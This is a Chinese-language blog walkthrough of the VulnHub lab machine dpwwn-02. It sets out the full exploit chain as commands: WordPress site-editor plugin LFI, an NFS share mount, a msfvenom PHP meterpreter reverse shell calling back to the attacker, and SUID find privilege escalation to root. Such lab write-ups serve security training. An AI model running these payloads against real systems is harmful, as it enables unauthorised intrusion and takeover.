vulnhub靶机-dpwwn-02

vulnhub靶机-dpwwn-02
知识点:

  • nmap
  • dirb
  • searchsploit
  • metaspaloit
  • LFI+NFS共享getshell
  • msfvenom
  • find提权

环境准备

靶机下载

下载靶机后解压,打开vmx文件即可,网卡设置为net模式

描述

该boot2root是基于Linux的虚拟机,并已使用VMware工作站进行了测试。

难度:中级++和乐趣。

目标:Get the root shell, and then obtain flag under /root(dpwwn-02-FLAG.txt).

网络配置

一、设置VMware的vmnet1(Host only)的子网IP为10.10.10.0,子网掩码255.255.255.0

1593681154630

二、将靶机的网络配适器设置为VMnet1(仅主机模式)

三、配置kali的网络配适器,也设置为VMnet1(仅主机模式)。

1
ifconfig eth0 10.10.10.12 netmask 255.255.255.0

1593684420804

kali的ip地址会莫名消失,所以需要时不时设置一下
ifconfig eth0 10.10.10.12 netmask 255.255.255.0

信息收集

靶机ip为10.10.10.10,使用nmap扫描开放的端口

1
nmap -A 10.10.10.10 -p 1-65535

1593685064634

靶机开放了80,111,443,2049等端口

先访问80端口,用dirb扫描目录可知为wordpress网站
1593685168930

1593685420538

使用wpscan进行扫描

1
wpscan --url http://10.10.10.10/wordpress/

1593685788355

发现一个site-editor插件,可通过搜索该插件的漏洞进行利用
扫描一下网站用户

1
wpscan --url http://10.10.10.10/wordpress/ -e u

1593685845914

只有一个admin用户,可尝试爆破密码

getshell

先使用searchsploit搜索一下插件漏洞
1593685963674

得到该版本插件存在一个LFI漏洞,查看payload

1
editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

1593693772337

1593693946084

成功执行,但是似乎还不能getshell。尝试通过wpscan进行密码爆破(到最后也没爆破成功)

在爆破的时候想到靶机还开放了2049端口,尝试挂载nfs共享
首先需要安装nfs客户端工具

1
apt-get install nfs-common

安装完成之后,使用showmount命令检索给定主机的导出文件夹列表。

1
showmount -e 10.10.10.10

得到/home/dpwwn02目录可以挂载

1
2
mkdir /mnt/dpwwn02
mount 10.10.10.10:/home/dpwwn02 /mnt/dpwwn02

成功挂载,并且具有创建文件的权限,可以通过写入ssh公钥文件(先使用ssh-keygen生成公私钥对)来进行登录,但是靶机未开放ssh端口,不能远程连接

这里需要配合LFI进行利用,先生成一个webshell文件,之后再通过文件包含访问来getshell

msfvenom生成webshell

1
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.12 LPORT=4444 R > webshell.php

将该文件cp到共享目录

通过msf监听并且通过浏览器访问该文件即可返回一个会话

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.10.12
set lport 4444
run

1
http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/home/dpwwn02/webshell.php

提权

先查看具有suid权限的命令

1
find / -perm -u=s -type f 2>/dev/null

发现find命令,通过该命令来进行提取

1
2
touch aaa 
find aaa -exec whoami \;

1
find aaa -exec /bin/sh -p \;

成功获得root权限

文章作者:CyzCc
最后更新:2020年07月06日 16:07:52
原始链接:https://cyzcc.vip/2020/07/06/dpwwn-02/
版权声明:转载请注明出处!
您的支持就是我的动力!
-------------    本文结束  感谢您的阅读    -------------